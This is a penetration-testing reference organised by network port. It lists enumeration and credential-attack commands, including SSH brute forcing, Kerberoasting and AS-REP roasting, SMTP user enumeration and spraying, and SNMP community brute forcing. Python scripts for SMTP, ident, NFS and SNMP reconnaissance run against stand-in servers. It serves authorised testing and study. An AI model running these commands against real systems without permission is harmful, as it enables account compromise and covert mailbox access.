Ports / Services
21 TCP - FTP
ftp
| Action | Command |
| --- | --- |
| Connect to server | `ftp <ip address>` |
| Upload file | `put <file>` |
| Download file | `get <file>` |
| Upload multiple files | `mput *` |
| Download multiple files | `mget *` |
| Change local current directory | `lcd <dir>` |
| Set binary mode (required for non-text files) | `binary` |
wget
| Action | Command |
| --- | --- |
| Recursively download FTP contents | `wget -r --ftp-user=<user> --ftp-password=<password> ftp://<ip address>/` |
| Mirror FTP | `wget --mirror ftp://<user>:<password>@<ip address>/` |
- Credentials passed on the command line or in the URL end up in shell history and process listings; prefer a `.netrc` entry on shared hosts.
ProFTPD (mod_copy)
- The mod_copy module adds `SITE CPFR` / `SITE CPTO`, which copy a file server-side between two remote paths; you need write permission on the destination directory.
| Action | Command |
| --- | --- |
| Connect to FTP server | `telnet <ip address> <port>` |
| Select a file to copy | `site cpfr <remote file>` |
| Select a location to copy the file to | `site cpto <remote directory to copy file to>` |
22 TCP - SSH
- Bruteforce credentials using:
- Hydra
- Crowbar for private keys
- Metasploit ssh_login module
25 TCP - SMTP
- Attack paths
  - Enumerate users: `VRFY <username>`, `EXPN <list>`, `RCPT TO` acceptance testing (after `MAIL FROM:<>`; compare `250` vs `550`)
  - Timing differences between valid and invalid `RCPT TO`
  - Re-test after `STARTTLS` (behaviour may change)
  - Open relay / mis-scoped relay (test on ports 25/587/465)
  - Spoofing exposure due to weak SPF/DKIM/DMARC
  - SMTP AUTH spray/brute on submission ports (587/465) if `AUTH` is advertised
  - NTLM relay to SMTP if `AUTH NTLM` is enabled
  - STARTTLS downgrade risk (opportunistic-only TLS)
SMTP commands
Miscellaneous
| Action | Command |
| --- | --- |
| Connect to SMTP server | `telnet <ip> <port>` |
| Connect to SMTP server (ncat, CRLF line endings) | `nc -nvC <ip> <port>` |
| Verify an email address | `VRFY <username>` |
| List a mailing list's membership | `EXPN <list>` |
| Keepalive / test | `NOOP` |
| Reset current transaction | `RSET` |
| Help | `HELP` |
| Quit | `QUIT` |
Send an email
| Step | Command |
| --- | --- |
| 1 | `EHLO <client-hostname>` (or `HELO <client-hostname>`) |
| 2 | `STARTTLS` (optional; if used, run `EHLO` again after TLS) |
| 3 | `AUTH LOGIN` (optional; server then prompts for base64 creds) |
| 4 | `MAIL FROM:<sender@example.com>` |
| 5 | `RCPT TO:<recipient@example.com>` (repeat per recipient) |
| 6 | `DATA` |
| 7 | type headers + blank line + body, then a line containing only a single `.` |
| 8 | `QUIT` (optional) |
Minimal RCPT-based enumeration (no delivery)
- `EHLO <client-fqdn>` - do not include angle brackets
- `MAIL FROM:<>` - keep the angle brackets, purposely empty (the null sender used for bounces)
- `RCPT TO:<user@domain>` - keep the angle brackets
- `EHLO` can be an IP literal if needed (e.g., `EHLO [192.0.2.10]`); if refused, use `HELO`.
- If you use `STARTTLS`, run `EHLO` again post-TLS.
- Responses: `250` = recipient accepted (valid user), `550` = no such user.
- A server that answers `250` for every recipient is either a catch-all or defers rejection until `DATA`; a uniform `250` means no signal, not "all valid". Use `RSET` between probes to stay in one session.
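The RCPT-based probe above, scripted: one session, `MAIL FROM:<>`, one `RCPT TO` per candidate with `RSET` in between, recording both the reply code and the round-trip time so the timing side channel can be compared. This is an added example, not part of the original notes; the target host, port, domain and user list are placeholders, and the in-process SMTP server (`FakeSMTPHandler`, with its `KNOWN_USERS`) is a constructed stand-in so the script runs offline.

```python
"""RCPT TO user enumeration against SMTP without delivering mail (added example)."""
import socket
import socketserver
import threading
import time

# Constructed: mailboxes the stand-in server will accept.
KNOWN_USERS = {"alice", "bob", "postmaster"}


def read_reply(sock_file):
    """Read one SMTP reply, including multi-line continuations ("250-...")."""
    lines = []
    while True:
        line = sock_file.readline().decode("ascii", "replace").rstrip("\r\n")
        if not line:
            raise ConnectionError("connection closed by server")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":   # "250 " ends the reply, "250-" continues it
            break
    return int(lines[0][:3]), lines


def send_cmd(sock, sock_file, cmd):
    sock.sendall((cmd + "\r\n").encode("ascii"))
    return read_reply(sock_file)


def enumerate_users(host, port, domain, users, helo="probe.example.test", timeout=5.0):
    """Return {user: (reply_code, seconds)} using EHLO / MAIL FROM:<> / RCPT TO.

    250 on RCPT TO = accepted (likely valid), 550 = rejected (no such user).
    No DATA is ever sent, so nothing is delivered; RSET drops the envelope
    between probes while keeping the single session open.
    """
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        f = sock.makefile("rb")
        code, _ = read_reply(f)                          # 220 banner
        if code != 220:
            raise RuntimeError(f"unexpected banner {code}")
        code, _ = send_cmd(sock, f, f"EHLO {helo}")
        if code != 250:                                  # old servers: fall back to HELO
            code, _ = send_cmd(sock, f, f"HELO {helo}")
            if code != 250:
                raise RuntimeError(f"HELO refused: {code}")
        for user in users:
            send_cmd(sock, f, "MAIL FROM:<>")            # null sender, bounce-style probe
            start = time.monotonic()
            code, _ = send_cmd(sock, f, f"RCPT TO:<{user}@{domain}>")
            results[user] = (code, time.monotonic() - start)
            send_cmd(sock, f, "RSET")
        send_cmd(sock, f, "QUIT")
    return results


class FakeSMTPHandler(socketserver.StreamRequestHandler):
    """Constructed stand-in server: just enough SMTP to answer the probe."""

    def handle(self):
        self.wfile.write(b"220 mail.example.test ESMTP\r\n")
        while True:
            line = self.rfile.readline().decode("ascii", "replace").strip()
            if not line:
                return
            verb = line.split(":", 1)[0].split(" ", 1)[0].upper()
            if verb == "EHLO":
                self.wfile.write(b"250-mail.example.test\r\n250 PIPELINING\r\n")
            elif verb == "RCPT":
                local = line.split("<", 1)[1].split("@", 1)[0]
                if local in KNOWN_USERS:
                    self.wfile.write(b"250 2.1.5 OK\r\n")
                else:
                    self.wfile.write(b"550 5.1.1 User unknown\r\n")
            elif verb == "QUIT":
                self.wfile.write(b"221 Bye\r\n")
                return
            else:                                        # HELO, MAIL, RSET, NOOP
                self.wfile.write(b"250 OK\r\n")


def run_demo(users=("alice", "bob", "mallory", "nobody")):
    """Start the stand-in server on a free port, probe it, return the results."""
    server = socketserver.TCPServer(("127.0.0.1", 0), FakeSMTPHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return enumerate_users("127.0.0.1", server.server_address[1], "example.test", users)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for user, (code, secs) in run_demo().items():
        verdict = "VALID" if code == 250 else "invalid" if code == 550 else f"code {code}"
        print(f"{user:10s} {verdict:8s} {secs * 1000:.1f} ms")
```

Against a real host, swap `run_demo()` for `enumerate_users("<ip>", 25, "<domain>", users)`; treat a result where every user comes back `250` as "no signal" and fall back to comparing the per-user timings.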
53 TCP - DNS
nslookup
| Action | Command |
| --- | --- |
| Interactive shell | `nslookup` |
| Query A (default resolver) | `nslookup <name>` |
| Query via specific server | `nslookup <name> <server>` |
| MX records | `nslookup -type=mx <domain>` |
| NS records | `nslookup -type=ns <domain>` |
| SOA record | `nslookup -type=soa <domain>` |
| TXT record | `nslookup -type=txt <name>` |
| Reverse (PTR) | `nslookup <ip>` |
| Zone transfer attempt (Windows nslookup, interactive) | `nslookup`, then `server <server>`, then `ls -d <domain>` |
- `ls` only exists in the Windows nslookup; on Linux use `dig ... AXFR` or `host -l` below for zone transfers.
host
| Action | Command |
| --- | --- |
| Query A | `host <name>` |
| Reverse (PTR) | `host <ip>` |
| MX records | `host -t mx <domain>` |
| NS records | `host -t ns <domain>` |
| SOA record | `host -t soa <domain>` |
| TXT record | `host -t txt <name>` |
| Zone transfer (AXFR) | `host -l <domain> <server>` |
dig
| Action | Command |
| --- | --- |
| A via specific server | `dig @<server> <name> A +short` |
| Reverse (PTR) | `dig -x <ip> +short` |
| MX records | `dig @<server> <domain> MX +short` |
| NS records | `dig @<server> <domain> NS +short` |
| SOA record | `dig @<server> <domain> SOA +short` |
| TXT record | `dig @<server> <name> TXT +short` |
| Zone transfer (AXFR) | `dig @<server> <domain> AXFR +tcp` |
| Trace delegation path | `dig +trace <name>` |
| CHAOS version.bind (server software version, if not suppressed) | `dig @<server> -c CH -t TXT version.bind +short` |
DNSRecon
| Action | Command |
| --- | --- |
| Standard records | `dnsrecon -d <domain>` |
| Standard against specific NS | `dnsrecon -d <domain> -n <server> -t std` |
| Zone transfer attempt | `dnsrecon -d <domain> -t axfr -n <server>` |
| Subdomain brute force | `dnsrecon -d <domain> -D <wordlist> -t brt` |
| Reverse sweep | `dnsrecon -r <cidr> -n <server>` |
69 UDP - TFTP
79 TCP - Finger
Send a user name followed by a newline; the service replies with the login, real name and profile. Example session:
```
$ nc -nv 192.168.108.140 79
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.108.140:79.
charlotte
Login: charlotte Name: Charlotte
[No profile information]
```
80 TCP - HTTP
- Cleartext / unencrypted web service
88 TCP - Kerberos
Attack paths
- Username enumeration with kerbrute (valid names get a pre-auth error, invalid ones a "client not found"): `kerbrute userenum -d <domain> --dc <dc_ip> <userlist>`
- AS-REP Roasting (accounts with pre-authentication disabled; crack with hashcat mode 18200): `impacket-GetNPUsers -dc-ip <dc_ip> <domain>/ -no-pass -usersfile <users.txt> -format hashcat -outputfile <hashes.txt>`
- Kerberoasting (request a TGS for every SPN-bearing account; crack with hashcat mode 13100): `impacket-GetUserSPNs -dc-ip <dc_ip> <domain>/<user>:'<pass>' -request -outputfile <hashes.txt>`
110 TCP - POP3
- Post Office Protocol: retrieves mail from a mailbox (cleartext unless wrapped in TLS on 995).
Commands
| Action | Command |
| --- | --- |
| Connect to server | `nc -nv <ip address> <port>` |
| Connect to server (ncat, CRLF line endings) | `nc -nvC <ip address> <port>` |
| Pick username to login with | `USER <username>` |
| Enter password | `PASS <password>` |
| List emails | `LIST` |
| Read email | `RETR <email # from list>` |
111 TCP – rpcbind / NFS
- RPC portmapper. Maps RPC program numbers to the TCP/UDP ports those services use (e.g., NFS, mountd, nlockmgr, statd, rquotad). If 111 is open, check for NFS (2049) and related RPC services. Note: NFSv3 typically uses rpcbind; NFSv4 can run on 2049 alone.
What to look for (findings)
- World-readable/writable exports (e.g., `*(rw)` or wide subnets).
- `no_root_squash` (client root = server root on the export).
- Sensitive paths exported (home dirs, backups, app secrets).
- UID/GID-based access (`sec=sys`, the default): the server trusts whatever UID/GID the client presents, so to read as a specific UID on a mounted share, run commands as that UID (e.g., `sudo -u '#1001' ls /mnt/nfs/...`).
- Kerberized NFS required? (e.g., `sec=krb5*`) - you won't mount without proper creds.
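The findings list above, turned into an audit over export definitions: the script parses `/etc/exports`-style lines (the options `showmount -e` hides), fills in the defaults `exportfs` applies when an option is omitted, and flags wide clients, `rw`, `no_root_squash`, sensitive paths and plain AUTH_SYS. This is an added example rather than anything from the original notes; the severity levels, the `SENSITIVE_PREFIXES` list and the `max_hosts` threshold are this example's own choices, and the `WEAK` / `HARDENED` export lines are constructed, not taken from a real host.

```python
"""Audit NFS export definitions for the findings listed above (added example)."""
import ipaddress
import re
import shlex

# Assumed list of path prefixes worth flagging; tune for the environment.
SENSITIVE_PREFIXES = ("/home", "/root", "/etc", "/var/backups", "/srv/backup")

# One client entry: "<client>(opt,opt)" or just "<client>"; options are optional.
CLIENT_RE = re.compile(r"^(?P<client>[^(]*)(?:\((?P<opts>[^)]*)\))?$")

# Constructed examples in /etc/exports syntax (not from a real host).
WEAK = """\
/srv/share      *(rw,sync,no_root_squash)
/home           10.0.0.0/8(rw)
/var/backups    *(ro)
/opt/app        10.0.5.20(ro,root_squash,sec=krb5p)
"""
HARDENED = """\
/srv/share      10.0.5.0/24(rw,sync,root_squash,sec=krb5p)
/opt/app        10.0.5.20(ro,root_squash,sec=krb5p)
"""


def parse_exports(text):
    """Yield (path, client, options) for every client of every export line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = shlex.split(line)      # copes with quoted paths
        if not clients:                         # bare path: exportfs exports it to everyone
            clients = ["*"]
        for entry in clients:
            m = CLIENT_RE.match(entry)
            if m is None:
                continue                        # malformed entry, skip rather than guess
            client = m.group("client") or "*"
            opts = set(filter(None, (m.group("opts") or "").split(",")))
            # exportfs defaults: ro and root_squash unless stated otherwise
            if not {"rw", "ro"} & opts:
                opts.add("ro")
            if not {"root_squash", "no_root_squash", "all_squash"} & opts:
                opts.add("root_squash")
            yield path, client, opts


def client_is_wide(client, max_hosts=256):
    """'*', wildcard hostnames, or any CIDR spanning more than max_hosts addresses."""
    if client == "*" or "*" in client or "?" in client:
        return True
    try:
        return ipaddress.ip_network(client, strict=False).num_addresses > max_hosts
    except ValueError:
        return False                            # hostname or @netgroup: not wide by itself


def audit_exports(text):
    """Return a list of (severity, path, client, finding) tuples."""
    findings = []
    for path, client, opts in parse_exports(text):
        wide = client_is_wide(client)
        if wide and "rw" in opts:
            findings.append(("HIGH", path, client, "world/wide-writable export"))
        elif wide:
            findings.append(("MEDIUM", path, client, "world/wide-readable export"))
        if "no_root_squash" in opts:
            findings.append(("HIGH", path, client, "no_root_squash: client root == server root"))
        if path.startswith(SENSITIVE_PREFIXES):
            findings.append(("MEDIUM", path, client, "sensitive path exported"))
        if "sec=sys" in opts or not any(o.startswith("sec=") for o in opts):
            findings.append(("INFO", path, client,
                             "AUTH_SYS: access decided by client-supplied UID/GID"))
    return findings


if __name__ == "__main__":
    for label, text in (("WEAK", WEAK), ("HARDENED", HARDENED)):
        print(f"== {label} ==")
        for sev, path, client, msg in audit_exports(text) or [("OK", "-", "-", "no findings")]:
            print(f"{sev:6s} {path:14s} {client:14s} {msg}")
```

Run it against a copy of the target's `/etc/exports` (readable once you have a foothold or an export that includes `/etc`); the `HARDENED` block shows what the same shares look like once the client list is narrowed and Kerberos (`sec=krb5p`) replaces UID trust.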
nmap
- Scan both TCP and UDP: rpcbind answers on either, and `-sU` alone would skip TCP 2049.
`sudo nmap -sS -sU -sV -p111,2049 --script "rpcinfo,nfs-*" <ip>`
rpcinfo
| Action | Command |
| --- | --- |
| List registered RPC programs and ports | `rpcinfo -p <ip>` |
| Summary by transport (tcp/udp) | `rpcinfo -s <ip>` |
| Query a specific program/version over TCP | `rpcinfo -t <ip> <prog> [<vers>]` |
| Query a specific program/version over UDP | `rpcinfo -u <ip> <prog> [<vers>]` |
showmount
| Action | Command |
| --- | --- |
| List exports | `showmount -e <ip>` |
| List clients using exports | `showmount -a <ip>` |
mount / umount
| Action | Command |
| --- | --- |
| Mount NFSv3 export | `sudo mount -t nfs -o ro,vers=3 <ip>:/<export> /mnt/nfs` |
| Mount NFSv4 root | `sudo mount -t nfs4 -o ro <ip>:/ /mnt/nfs` |
| Unmount | `sudo umount /mnt/nfs` |
113 TCP – ident
- Legacy Identification Protocol (RFC 1413): maps a TCP connection to the local username on the target. Often disabled/firewalled; useless behind NAT.
nmap
| Action | Command |
| --- | --- |
| Identify ident service | `nmap -p113 -sV <host>` |
| Enumerate owners of selected services via ident | `nmap -p113,<ports> --script=auth-owners <host>` |
| Try ident against all open TCP ports (slower) | `nmap -sT -p- --script=auth-owners <host>` |
- `auth-owners` runs once per open TCP port in the scan, so 113 must be open and the ports you care about must be included; scanning only 113 reports the owner of identd itself.
- Manual probe (requires a live TCP connection to the target port): connect to some service on the host, keep that connection open, then connect to port 113 and send `<server-port> , <your-src-port>` followed by CRLF. The reply is `<server-port> , <your-src-port> : USERID : <os> : <user>` on success or `... : ERROR : NO-USER` (connection unknown) / `HIDDEN-USER` (owner refuses disclosure).
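The manual probe above as a complete exchange with both sides visible: the client opens a connection to a service, asks the host's identd who owns that connection, and parses the `USERID` / `ERROR` reply. This is an added example and not from the original notes; the service user `charlotte` is assumed, and both the service and the identd are constructed in-process stand-ins (`FakeService`, `FakeIdentd`) so the round trip runs offline and shows why a closed or unknown connection yields `NO-USER`.

```python
"""ident (RFC 1413) lookup: map a live TCP connection to its remote owner (added example)."""
import socket
import socketserver
import threading

# Constructed: identd's view of which local user owns which connection,
# keyed (server_port, client_port) exactly as the ident query names them.
OWNERS = {}
OWNERS_LOCK = threading.Lock()
SERVICE_USER = "charlotte"   # assumed owner of the stand-in service


class FakeService(socketserver.StreamRequestHandler):
    """Any TCP service: record who owns the accepted connection, banner, then wait."""

    def handle(self):
        key = (self.server.server_address[1], self.client_address[1])
        with OWNERS_LOCK:
            OWNERS[key] = SERVICE_USER
        self.wfile.write(b"220 stand-in service ready\r\n")   # banner; also syncs the demo
        self.rfile.readline()                                  # hold until the client closes


class FakeIdentd(socketserver.StreamRequestHandler):
    """RFC 1413 responder: '<server-port> , <client-port>' -> USERID or ERROR line."""

    def handle(self):
        query = self.rfile.readline().decode("ascii", "replace").strip()
        try:
            sport, cport = (int(p.strip()) for p in query.split(","))
        except ValueError:
            self.wfile.write(b"0 , 0 : ERROR : INVALID-PORT\r\n")
            return
        with OWNERS_LOCK:
            user = OWNERS.get((sport, cport))
        if user is None:
            self.wfile.write(f"{sport} , {cport} : ERROR : NO-USER\r\n".encode("ascii"))
        else:
            self.wfile.write(f"{sport} , {cport} : USERID : UNIX : {user}\r\n".encode("ascii"))


def parse_ident_reply(reply):
    """Return (user, None) for a USERID reply, (None, error_type) for an ERROR reply."""
    fields = [f.strip() for f in reply.split(":")]
    if len(fields) >= 4 and fields[1] == "USERID":
        return fields[3], None
    if len(fields) >= 3 and fields[1] == "ERROR":
        return None, fields[2]
    raise ValueError(f"unparseable ident reply: {reply!r}")


def ident_lookup(host, service_port, ident_port=113, timeout=5.0):
    """Connect to <host>:<service_port>, then ask identd on <host> who owns that connection.

    The service socket must stay open while identd is queried; once it closes,
    the port pair no longer exists on the target and identd answers NO-USER.
    """
    with socket.create_connection((host, service_port), timeout=timeout) as svc:
        svc.makefile("rb").readline()              # consume the banner
        my_port = svc.getsockname()[1]
        with socket.create_connection((host, ident_port), timeout=timeout) as idn:
            idn.sendall(f"{service_port} , {my_port}\r\n".encode("ascii"))
            reply = idn.makefile("rb").readline().decode("ascii", "replace").strip()
        svc.sendall(b"\r\n")                       # release the stand-in service
    return parse_ident_reply(reply)


def run_demo():
    """Start both stand-ins, query a live and a stale connection, return both results."""
    svc = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeService)
    idn = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeIdentd)
    for s in (svc, idn):
        threading.Thread(target=s.serve_forever, daemon=True).start()
    try:
        live = ident_lookup("127.0.0.1", svc.server_address[1], idn.server_address[1])
        with socket.create_connection(("127.0.0.1", idn.server_address[1])) as s:
            s.sendall(b"1 , 2\r\n")                 # a pair identd never saw
            stale = parse_ident_reply(s.makefile("rb").readline().decode("ascii").strip())
        return live, stale
    finally:
        for s in (svc, idn):
            s.shutdown()
            s.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Against a real target, call `ident_lookup("<ip>", <open service port>)`; a `HIDDEN-USER` error means identd is running but the connection owner has opted out, which is still useful as proof that the service is present.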
119 TCP - NNTP
- Network News Transfer Protocol
Commands
| Action | Command |
| --- | --- |
| Connect to server | `nc -nv <ip> <port>` |
| List newsgroups with their article ranges | `LIST` |
Example `LIST` response:
```
215 list of newsgroups follows
org.apache.avalon.dev 0 0 y
org.apache.avalon.user 0 0 y
```
Each line is `<group> <high> <low> <posting-status>` (`y` = posting allowed). High and low article numbers of 0 mean the group holds no articles, so there is nothing to read.
135 TCP - MSRPC
impacket-rpcdump
- Query the Endpoint Mapper to list RPC endpoints, interfaces (UUIDs), and their dynamic ports.
| Action | Command |
| --- | --- |
| Enumerate RPC endpoints (unauth) | `impacket-rpcdump <target>` |
| Enumerate with credentials | `impacket-rpcdump <domain>/<user>:<pass>@<target>` |
impacket-rpcmap
- Query the RPC management interface to list bound DCE/RPC interfaces on a given transport/port.
| Action | Command |
| --- | --- |
| List interfaces via EPM on TCP/135 | `impacket-rpcmap 'ncacn_ip_tcp:<ip>'` |
| List interfaces on a specific RPC port | `impacket-rpcmap 'ncacn_ip_tcp:<ip>[1025]'` |
| List via SMB named pipe (EPM) | `impacket-rpcmap 'ncacn_np:<ip>[\\pipe\\epmapper]'` |
Nmap – msrpc-enum (NSE)
- Nmap script that queries the MS-RPC endpoint mapper and summarizes mapped services.
| Action | Command |
| --- | --- |
| Enumerate mapped RPC services | `nmap -p135 --script msrpc-enum <target>` |
| Same, with SMB auth (if supported) | `nmap -p135 --script msrpc-enum --script-args smbusername=<user>,smbpassword=<pass> <target>` |
137/UDP – NetBIOS Name Service (NBNS)
- Legacy name resolution and Node Status.
- Works only if NetBIOS over TCP/IP is enabled and UDP/137 is reachable.
nbtscan
| Action | Command |
| --- | --- |
| Enumerate NetBIOS names | `sudo nbtscan -r <cidr>` |
139/TCP – NetBIOS Session Service
- Legacy transport for SMB1 (NT1).
- Modern SMB (SMB2/3) uses 445 and does not require NetBIOS.
- Enumeration on 139 works only if SMB1 is enabled on the target.
- Only useful if 445 is unavailable or the host is SMB1-only.
- Test SMB1 on 139: `smbclient -L <ip> -p 139 -m NT1`
- Null session via RPC: `rpcclient -U '' -N -p 139 <ip>`
- See SMB & RPC Enumeration
143 TCP - IMAP
Commands
- Every IMAP command carries a client-chosen tag (`A1`, `A2`, ...); the server repeats the tag on the line that completes that command, so scripted sessions should use a fresh tag per command.
| Action | Command |
| --- | --- |
| Connect to service (cleartext) | `nc -nv <ip> 143` |
| Connect to service (STARTTLS) | `openssl s_client -crlf -quiet -starttls imap -connect <host>:143` |
| Login | `A1 LOGIN <username> <password>` |
| Login (quoted values) | `A1 LOGIN "<username>" "<password>"` |
| List all folders/mailboxes | `A1 LIST "" *` |
| List INBOX children | `A1 LIST INBOX *` |
| List "Archive" children | `A1 LIST "Archive" *` |
| Create folder/mailbox | `A1 CREATE "<name>"` |
| Delete folder/mailbox | `A1 DELETE <name>` |
| Rename folder/mailbox | `A1 RENAME <old> <new>` |
| List subscribed folders | `A1 LSUB "" *` |
| Mailbox status | `A1 STATUS INBOX (MESSAGES UNSEEN RECENT)` |
| Select mailbox | `A1 SELECT INBOX` |
| List messages (flags) | `A1 FETCH 1:* (FLAGS)` |
| List messages by UID (flags) | `A1 UID FETCH 1:* (FLAGS)` |
| Retrieve message body (text; marks the message \Seen) | `A1 FETCH 2 BODY[TEXT]` |
| Retrieve message (all) | `A1 FETCH 2 ALL` |
| Retrieve by UID (peek; does not set \Seen, so the owner sees no change) | `A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[])` |
| Close mailbox | `A1 CLOSE` |
| Logout | `A1 LOGOUT` |
161 UDP - SNMP
- SNMP: protocol for managing/monitoring network devices (typically UDP/161 for queries, UDP/162 for traps).
- MIB (Management Information Base): hierarchical definitions (OIDs) of manageable data; devices expose values for those objects.
- Security: SNMPv1/v2c send community strings and data in cleartext (no auth/integrity/encryption) → sniffing, spoofing, replay possible; ACLs based on source IP can be bypassed with spoofing. SNMPv3 provides authentication and encryption (auth/priv) and timeliness checks.
- Defaults: “public” (RO) and “private” (RW) community strings are historically common and still encountered on misconfigured gear
MIB Objects / OIDs:
| MIB Object | OID |
| --- | --- |
| TCP Local Ports | `1.3.6.1.2.1.6.13.1.3` |
| User Accounts | `1.3.6.1.4.1.77.1.2.25` |
| Software Name | `1.3.6.1.2.1.25.6.3.1.2` |
| Storage Units | `1.3.6.1.2.1.25.2.3.1.4` |
| Processes Path | `1.3.6.1.2.1.25.4.2.1.4` |
| Running Programs | `1.3.6.1.2.1.25.4.2.1.2` |
| System Processes | `1.3.6.1.2.1.25.1.6.0` |
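A full walk of a device is thousands of lines; what the OID table above really buys you is the ability to pull the useful rows back out of that dump. The script below does that for numeric (`snmpwalk -On`) output: it rebuilds the process table from the Running Programs and Processes Path columns, lists listening TCP ports from the TCP Local Ports table (whose index encodes local and remote address/port), extracts the Windows account names, and flags process arguments that carry credentials. This is an added example, not from the original notes; `SAMPLE_WALK` is constructed (it mixes Linux host-resources rows with a Windows account branch purely for illustration), and the process-arguments column `1.3.6.1.2.1.25.4.2.1.5` is the page's hrSWRun table one column further on, used here on the assumption that the device exposes it.

```python
"""Pull the interesting rows out of an snmpwalk dump using the OIDs above (added example)."""
import re

HR_SW_RUN_NAME = "1.3.6.1.2.1.25.4.2.1.2"      # Running Programs
HR_SW_RUN_PATH = "1.3.6.1.2.1.25.4.2.1.4"      # Processes Path
HR_SW_RUN_PARAMS = "1.3.6.1.2.1.25.4.2.1.5"    # process arguments (same table, column 5)
TCP_CONN_LOCAL_PORT = "1.3.6.1.2.1.6.13.1.3"   # TCP Local Ports
USER_ACCOUNTS = "1.3.6.1.4.1.77.1.2.25"        # User Accounts (Windows LanMgr MIB)

# "<oid> = <TYPE>: <value>" as printed by snmpwalk -On
LINE_RE = re.compile(r"^\.?(?P<oid>[\d.]+) = (?P<type>[A-Za-z0-9-]+): ?(?P<value>.*)$")

# Constructed walk output; not a capture from a real device.
SAMPLE_WALK = """\
.1.3.6.1.2.1.6.13.1.3.0.0.0.0.22.0.0.0.0.0 = INTEGER: 22
.1.3.6.1.2.1.6.13.1.3.0.0.0.0.3306.0.0.0.0.0 = INTEGER: 3306
.1.3.6.1.2.1.6.13.1.3.10.0.0.5.22.10.0.0.9.51234 = INTEGER: 22
.1.3.6.1.2.1.25.1.6.0 = Gauge32: 93
.1.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
.1.3.6.1.2.1.25.4.2.1.2.842 = STRING: "sshd"
.1.3.6.1.2.1.25.4.2.1.2.1337 = STRING: "python3"
.1.3.6.1.2.1.25.4.2.1.4.1 = STRING: "/sbin/init"
.1.3.6.1.2.1.25.4.2.1.4.842 = STRING: "/usr/sbin/sshd"
.1.3.6.1.2.1.25.4.2.1.4.1337 = STRING: "/usr/bin/python3"
.1.3.6.1.2.1.25.4.2.1.5.1 = STRING: ""
.1.3.6.1.2.1.25.4.2.1.5.842 = STRING: "-D"
.1.3.6.1.2.1.25.4.2.1.5.1337 = STRING: "/opt/app/backup.py --password=S3cret!"
.1.3.6.1.4.1.77.1.2.25.1.1.5.97.100.109.105.110 = STRING: "admin"
.1.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
End of MIB
"""


def parse_walk(text):
    """Yield (oid, type, value); STRING quotes are stripped, integer types become int."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                                   # "End of MIB", timeouts, wrapped lines
        oid, typ, val = m.group("oid"), m.group("type"), m.group("value")
        if typ == "STRING":
            val = val.strip('"')
        elif typ in ("INTEGER", "Gauge32", "Counter32", "Counter64"):
            val = int(re.search(r"-?\d+", val).group())  # also handles "up(1)" style values
        yield oid, typ, val


def _column(entries, prefix):
    """Map the index suffix (what follows the column OID) to the value, for one table column."""
    p = prefix + "."
    return {oid[len(p):]: val for oid, _, val in entries if oid.startswith(p)}


def running_programs(entries):
    """{pid: {name, path, params}} rebuilt from the hrSWRun columns."""
    names = _column(entries, HR_SW_RUN_NAME)
    paths = _column(entries, HR_SW_RUN_PATH)
    params = _column(entries, HR_SW_RUN_PARAMS)
    return {int(pid): {"name": n, "path": paths.get(pid, ""), "params": params.get(pid, "")}
            for pid, n in names.items()}


def tcp_local_ports(entries, listening_only=True):
    """Sorted local ports; index = localAddr(4).localPort.remAddr(4).remPort, listeners have remote 0.0.0.0:0."""
    ports = set()
    for idx, port in _column(entries, TCP_CONN_LOCAL_PORT).items():
        parts = idx.split(".")
        if len(parts) != 10:
            continue
        remote = (".".join(parts[5:9]), parts[9])
        if listening_only and remote != ("0.0.0.0", "0"):
            continue
        ports.add(int(port))
    return sorted(ports)


def user_accounts(entries):
    """Account names from the Windows LanMgr branch (index is the length-prefixed name)."""
    return sorted(_column(entries, USER_ACCOUNTS).values())


def secrets_in_arguments(programs, needles=("password", "passwd", "pwd=", "token")):
    """Processes whose command line looks like it carries a credential."""
    return {pid: p for pid, p in programs.items()
            if any(n in p["params"].lower() for n in needles)}


if __name__ == "__main__":
    entries = list(parse_walk(SAMPLE_WALK))
    progs = running_programs(entries)
    print("listening:", tcp_local_ports(entries))
    print("accounts:", user_accounts(entries))
    for pid, p in secrets_in_arguments(progs).items():
        print(f"pid {pid} {p['path']} {p['params']}")
```

Feed it `snmpwalk -On -v2c -c <community> <ip> . > walk.txt` output by replacing `SAMPLE_WALK` with the file contents; `-On` matters, because the default symbolic names would not match the numeric prefixes.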
onesixtyone
- SNMP scanner / community string brute force
| Action | Command |
| --- | --- |
| Scan with community wordlist | `onesixtyone -c <communities.txt> <cidr-or-host>` |
| Scan host list | `onesixtyone -c <communities.txt> -i <hosts.txt>` |
snmpget
- Read a single OID
| Action | Command |
| --- | --- |
| Read single OID (v2c) | `snmpget -v2c -c <community> <ip> <OID>` |
snmpwalk
- Probe and query SNMP values by walking a subtree
| Action | Command |
| --- | --- |
| Walk entire tree (v1) | `snmpwalk -v1 -c <community> <ip> .` |
| Walk entire tree (v2c) | `snmpwalk -v2c -c <community> <ip> .` |
| Walk specific OID (v2c) | `snmpwalk -v2c -c <community> <ip> <OID>` |
| Walk (v3, authPriv) | `snmpwalk -v3 -l authPriv -u <user> -a SHA -A <authpass> -x AES -X <privpass> <ip> .` |
snmpbulkwalk
| Action | Command |
| --- | --- |
| Bulk walk (v2c) | `snmpbulkwalk -v2c -c <community> <ip> .` |
| Bulk walk (v3, authPriv) | `snmpbulkwalk -v3 -l authPriv -u <user> -a SHA -A <authpass> -x AES -X <privpass> <ip> .` |
389 TCP - LDAP
- Cleartext LDAP (no TLS unless `STARTTLS` is negotiated).
- Query directory objects (users, groups, computers, policy) from a Domain Controller (DC); the forest-wide Global Catalog is a separate endpoint on 3268/3269.
ldapsearch
| Action | Command |
| --- | --- |
| Basic search (anonymous) | `ldapsearch -H ldap://<ip> -x` |
